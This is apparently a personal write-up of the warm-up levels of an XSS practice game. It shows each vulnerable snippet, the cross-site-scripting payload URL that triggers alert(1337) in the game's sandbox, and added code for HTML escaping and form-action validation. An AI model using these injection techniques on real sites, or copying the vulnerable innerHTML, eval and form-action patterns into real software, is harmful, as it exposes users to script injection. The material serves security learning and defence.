# XSS Game

## Description

This is a list of the challenges I do on this [link](https://xss.pwnfunction.com/).

# Warm up

## Ma Spaghet!

**Source of injection:** end of link: `/?<badstuff>`

**code:**

```html
<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>
    spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>
```

The script basically looks at the URL and grabs the `somebody` parameter, which it writes to `innerHTML`. That parameter is where we can inject:

`https://sandbox.pwnfunction.com/warmups/ma-spaghet.html/?somebody=<img src=0 onerror=alert(1337)>`

## Jeff

**code:**

```html
<!-- Challenge -->
<h2 id="maname"></h2>
<script>
    let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
    let ma = ""
    eval(`ma = "Ma name ${jeff}"`)
    setTimeout(_ => {
        maname.innerText = ma
    }, 1000)
</script>
```

The `jeff` parameter is interpolated via `${jeff}` into the code string passed to `eval`, so we can use it to execute the alert:

`https://sandbox.pwnfunction.com/warmups/jefff.html/?jeff="-alert(1337)-"`

## Ugandan Knuckles

**code:**

```html
<!-- Challenge -->
<div id="uganda"></div>
<script>
    let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
    wey = wey.replace(/[<>]/g, '')
    uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>
```

We can use the `wey` parameter, but it is a little trickier: we cannot use `<` or `>`, because the `/[<>]/g` replace strips them. We can still manipulate the `<input ...>` where `wey` is placed, using `onfocus`:

`https://sandbox.pwnfunction.com/warmups/da-wey.html/?wey="onfocus=alert(1337) autofocus="`

## Ricardo Milos

**code:**

```html
<!-- Challenge -->
<form id="ricardo" method="GET">
    <input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
    ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
    setTimeout(_ => {
        ricardo.submit()
    }, 2000)
</script>
```

The script reads the `ricardo` GET parameter and uses this user-controlled input to set the form's `action`. The form is then auto-submitted:

`https://sandbox.pwnfunction.com/warmups/ricardo.html/?ricardo=javascript:alert(1337)`
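
Hardened handling for the sinks used in the warm-ups above, as an added example that is not part of the original notes or the challenge code. The function names and the `https://example.test` page URL are assumptions made for illustration; the inputs in the usage lines are the payloads already shown above.

```javascript
// Added example (not challenge code): treat URL parameters as data, not markup or code.
// Ma Spaghet! and Jeff need no helper: assign the parameter with textContent
// instead of innerHTML, and build the string directly instead of calling eval.

// Ugandan Knuckles: stripping only < and > leaves the double quote, so the
// value can still close the placeholder attribute. Escape every character
// that is significant in HTML text or in a quoted attribute.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

function renderInput(wey) {
  return `<input type="text" placeholder="${escapeHtml(wey)}" class="form-control">`;
}

// Ricardo Milos: a form action is a URL sink. Parse the value, then allow
// only http(s) targets on the page's own origin; anything else becomes '#'.
function safeFormAction(raw, pageUrl) {
  const fallback = '#';
  if (typeof raw !== 'string' || raw === '') return fallback;
  let target;
  try {
    target = new URL(raw, pageUrl); // relative values resolve against the page
  } catch {
    return fallback;
  }
  const schemeOk = target.protocol === 'http:' || target.protocol === 'https:';
  const sameOrigin = target.origin === new URL(pageUrl).origin;
  return schemeOk && sameOrigin ? target.href : fallback;
}

// Usage with the payloads from the notes above (page URL is a placeholder).
const PAGE = 'https://example.test/warmups/ricardo.html';
console.log(renderInput('"onfocus=alert(1337) autofocus="'));
console.log(safeFormAction('javascript:alert(1337)', PAGE)); // rejected
console.log(safeFormAction('/search', PAGE));                // same-origin, kept
```

In the browser, `safeFormAction` would be called with `location.href` as the second argument before assigning to `ricardo.action`.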